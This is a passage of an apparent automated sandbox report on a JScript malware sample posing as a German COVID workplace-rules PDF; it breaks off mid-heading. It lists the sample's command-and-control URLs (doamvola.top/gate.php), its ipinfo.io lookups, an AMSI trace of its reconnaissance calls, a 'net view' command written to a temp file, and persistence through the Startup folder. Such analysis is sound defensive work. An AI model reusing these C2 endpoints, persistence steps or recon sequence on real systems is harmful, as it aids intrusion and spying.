Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.276907486.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpC
Source: wscript.exe, 00000000.00000003.624878825.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpD
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpF
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpG
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpM
Source: wscript.exe, 00000000.00000003.576439917.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpN
Source: wscript.exe, 00000000.00000003.770612475.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.543239710.000001C47F8BF000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpRequest.5)
Source: wscript.exe, 00000000.00000003.721768746.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpRequest.5)S
Source: wscript.exe, 00000008.00000003.835520883.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpT
Source: wscript.exe, 00000008.00000003.835520883.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpY
Source: wscript.exe, 00000000.00000003.770612475.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpZ
Source: wscript.exe, 00000008.00000003.472743003.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php_
Source: wscript.exe, 00000008.00000003.543353801.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpa
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpe
Source: wscript.exe, 00000000.00000003.261419753.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpem32
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpg
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpi
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpk
Source: wscript.exe, 00000000.00000003.261419753.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpl
Source: wscript.exe, 00000000.00000003.310555901.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.786836988.000001C47F8C1000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phplll
Source: wscript.exe, 00000000.00000003.624878825.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpm
Source: wscript.exe, 00000000.00000003.456401710.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpm32
Source: wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpn
Source: wscript.exe, 00000008.00000003.472743003.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpp
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpq
Source: wscript.exe, 00000000.00000003.261419753.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpr
Source: wscript.exe, 00000000.00000003.407758247.000001A97B156000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpsvc
Source: wscript.exe, 00000008.00000002.882246112.000001C47F8C5000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpt.5)
Source: wscript.exe, 00000000.00000003.407731714.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpt.5)3
Source: wscript.exe, 00000000.00000003.407758247.000001A97B156000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phptive
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.424338976.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpu
Source: wscript.exe, 00000008.00000003.640853101.000001C47F8C1000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpxe887
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gr
Source: wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/i
Source: wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.543151341.000001C47F899000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/m
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/md.exeu
Source: wscript.exe, 00000008.00000003.543302233.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/n
Source: wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.689639167.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/ndex
Source: wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/r
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/son
Source: wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/ver
Source: wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/ver-
Source: wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/ver5
Source: wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/verA
Source: wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/verb
Source: wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/verm
Source: wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/verxe
Source: wscript.exe, 00000000.00000003.456401710.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.261419753.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.423992956.000001C47F8BF000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top:80/gate.php
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top:80/gate.php0
Source: wscript.exe, 00000008.00000002.882246112.000001C47F8C5000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top:80/gate.phpp
Source: wscript.exe, 00000008.00000003.786836988.000001C47F8C1000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top:80/gate.phppE(
Source: wscript.exe, 00000000.00000002.927827180.000001A97B0D1000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.872334012.000001C47F860000.00000004.00000001.sdmpString found in binary or memory: http://ipinfo.io/
Source: wscript.exe, 00000008.00000003.277238359.000001C47F899000.00000004.00000001.sdmpString found in binary or memory: http://ipinfo.io/T
Source: wscript.exe, 00000008.00000003.263600682.000001C47EF18000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.259752808.000001C47EF05000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.869365398.000001C47EF58000.00000004.00000001.sdmp, Arbeitsschutzregel-Corona-September.pdf.jsString found in binary or memory: http://ipinfo.io/country
Source: wscript.exe, 00000008.00000003.263600682.000001C47EF18000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.375532736.000001C47D2A2000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.859214338.000001C47D213000.00000004.00000020.sdmp, wscript.exe, 00000008.00000002.869365398.000001C47EF58000.00000004.00000001.sdmp, Arbeitsschutzregel-Corona-September.pdf.jsString found in binary or memory: http://ipinfo.io/ip
Source: wscript.exe, 00000000.00000002.918750935.000001A97B080000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0M
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640584970.000001C47F8A9000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1d20
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640584970.000001C47F8A9000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1D2.crt0
Source: wscript.exe, 00000008.00000003.424338976.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: https://displaycatalogoamvola.top/
Source: wscript.exe, 00000000.00000003.261381022.000001A97B13E000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.326005298.000001C47F899000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/
Source: wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/V
Source: wscript.exe, 00000000.00000003.310579250.000001A97B127000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.423992956.000001C47F8BF000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/country
Source: wscript.exe, 00000008.00000003.543239710.000001C47F8BF000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/country6
Source: wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/countryF6E6963
Source: wscript.exe, 00000000.00000002.927827180.000001A97B0D1000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/t
Source: wscript.exe, 00000000.00000002.916942153.000001A97B06D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000002.916942153.000001A97B06D000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.887480150.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: https://login.live.comoamvola.top/
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: wscript.exe, 00000000.00000002.917846360.000001A97B079000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/(
Source: wscript.exe, 00000000.00000002.917846360.000001A97B079000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/R
Source: wscript.exe, 00000000.00000002.887458501.000001A97A6DB000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/jso
Source: wscript.exe, 00000008.00000003.263600682.000001C47EF18000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.259752808.000001C47EF05000.00000004.00000001.sdmp, Arbeitsschutzregel-Corona-September.pdf.jsString found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js
Source: wscript.exe, 00000000.00000002.859851994.000001A9788BC000.00000004.00000020.sdmpString found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js&
Source: wscript.exe, 00000000.00000002.887515915.000001A97A7E5000.00000004.00000040.sdmpString found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js)
Source: wscript.exe, 00000000.00000002.859851994.000001A9788BC000.00000004.00000020.sdmpString found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js0
Source: wscript.exe, 00000008.00000002.859174186.000001C47D1B8000.00000004.00000020.sdmpString found in binary or memory: https://settings-win.doamvola.top/
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443

System Summary:

barindex
Source: Arbeitsschutzregel-Corona-September.pdf.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winJS@12/6@8/6
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\json2[1].jsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\json2.jsJump to behavior
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: wscript.exe, 00000000.00000003.206611156.000001A97A685000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.259752808.000001C47EF05000.00000004.00000001.sdmpBinary or memory string: SELECT * FROM AntivirusProduct;
Source: Arbeitsschutzregel-Corona-September.pdf.jsVirustotal: Detection: 40%
Source: Arbeitsschutzregel-Corona-September.pdf.jsReversingLabs: Detection: 24%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arbeitsschutzregel-Corona-September.pdf.js'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad17A1B.tmp'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\radDC873.tmp'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad17A1B.tmp'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\radDC873.tmp'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: Binary string: wscript.pdbGCTL source: wscript.exe, 00000000.00000002.866841213.000001A978B80000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.859907568.000001C47D2D0000.00000002.00000001.sdmp
Source: Binary string: scrrun.pdb source: wscript.exe, 00000000.00000002.884606588.000001A97A320000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869485807.000001C47F040000.00000002.00000001.sdmp
Source: Binary string: wshom.pdbUGP source: wscript.exe, 00000000.00000002.884578918.000001A97A2E0000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869452646.000001C47F010000.00000002.00000001.sdmp
Source: Binary string: wscript.pdb source: wscript.exe, 00000000.00000002.866841213.000001A978B80000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.859907568.000001C47D2D0000.00000002.00000001.sdmp
Source: Binary string: wshom.pdb source: wscript.exe, 00000000.00000002.884578918.000001A97A2E0000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869452646.000001C47F010000.00000002.00000001.sdmp
Source: Binary string: winhttpcom.pdb source: wscript.exe, 00000000.00000002.887873779.000001A97A8A0000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869519267.000001C47F090000.00000002.00000001.sdmp
Source: Binary string: scrrun.pdbUGP source: wscript.exe, 00000000.00000002.884606588.000001A97A320000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869485807.000001C47F040000.00000002.00000001.sdmp
Source: Binary string: winhttpcom.pdbGCTL source: wscript.exe, 00000000.00000002.887873779.000001A97A8A0000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869519267.000001C47F090000.00000002.00000001.sdmp

Data Obfuscation:

barindex
JScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IHost.CreateObject("Microsoft.XMLHTTP");IHost.CreateObject("Scripting.FileSystemObject");IHost.CreateObject("WScript.Shell");IWshShell3.Environment("Process");IWshEnvironment.Item("temp");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\json2.js");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/douglascrockford/JSON-js/master/jso", "true");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "XMLHTTP/1.0");IServerXMLHTTPRequest2.send("");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IServerXMLHTTPRequest2.responseText();IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\json2.js", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("// json2.js// 2017-06-12// Public Domain.// NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.// USE YOUR OWN COPY. IT IS EXTREMELY UNWISE TO LOAD CODE FROM SERVERS YOU DO// NOT CONTROL.// This file creates a ");ITextStream.Close();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWinHttpRequest.Open("GET", "http://ipinfo.io/ip", "false");IWinHttpRequest.Send();IWinHttpRequest.WaitForResponse();IWinHttpRequest.ResponseText();IWinHttpRequest.Open("GET", "http://ipinfo.io/country", "false");IWinHttpRequest.Send();IWinHttpRequest.WaitForResponse();IWinHttpRequest.ResponseText();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_OperatingSystem");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshNetwork2.ComputerName();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IWshNetwork2.UserDomain();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");ISWbemServicesEx.ExecQuery("SELECT * FROM AntivirusProduct");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_Processor");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_VideoController");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.CreateObject("Shell.Application");IShellDispatch6.GetSystemInformation("PhysicalMemoryInstalled");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemObjectEx._01800002();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();IFileSystem3.GetSpecialFolder("2");IFileSystem3.GetTempName();IFileSystem3.BuildPath("Unsupported parameter type 00000009", "rad17A1B.tmp");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\rad17A1B.tmp");IFileSystem3.GetSpecialFolder("1");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "cmd.exe");I
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IHost.CreateObject("Microsoft.XMLHTTP");IHost.CreateObject("Scripting.FileSystemObject");IHost.CreateObject("WScript.Shell");IWshShell3.Environment("Process");IWshEnvironment.Item("temp");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\json2.js");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\json2.js", "1");ITextStream.ReadAll();ITextStream.Close();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWinHttpRequest.Open("GET", "http://ipinfo.io/ip", "false");IWinHttpRequest.Send();IWinHttpRequest.WaitForResponse();IWinHttpRequest.ResponseText();IWinHttpRequest.Open("GET", "http://ipinfo.io/country", "false");IWinHttpRequest.Send();IWinHttpRequest.WaitForResponse();IWinHttpRequest.ResponseText();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_OperatingSystem");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshNetwork2.ComputerName();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IWshNetwork2.UserDomain();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");ISWbemServicesEx.ExecQuery("SELECT * FROM AntivirusProduct");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_Processor");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_VideoController");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.CreateObject("Shell.Application");IShellDispatch6.GetSystemInformation("PhysicalMemoryInstalled");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemObjectEx._01800002();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();IFileSystem3.GetSpecialFolder("2");IFileSystem3.GetTempName();IFileSystem3.BuildPath("Unsupported parameter type 00000009", "radDC873.tmp");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\radDC873.tmp");IFileSystem3.GetSpecialFolder("1");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "cmd.exe");IWshShell3.Run("C:\Windows\System32\cmd.exe /C net view > "C:\Users\user\AppData\Local\Te", "0", "true");([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([]

Boot Survival:

barindex
Drops script or batch files to the startup folderShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.jsJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.jsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.jsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js\:Zone.Identifier:$DATAJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Uses an obfuscated file name to hide its real file extension (double extension)Show sources
Source: Possible double extension: pdf.jsStatic PE information: Arbeitsschutzregel-Corona-September.pdf.js
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

bar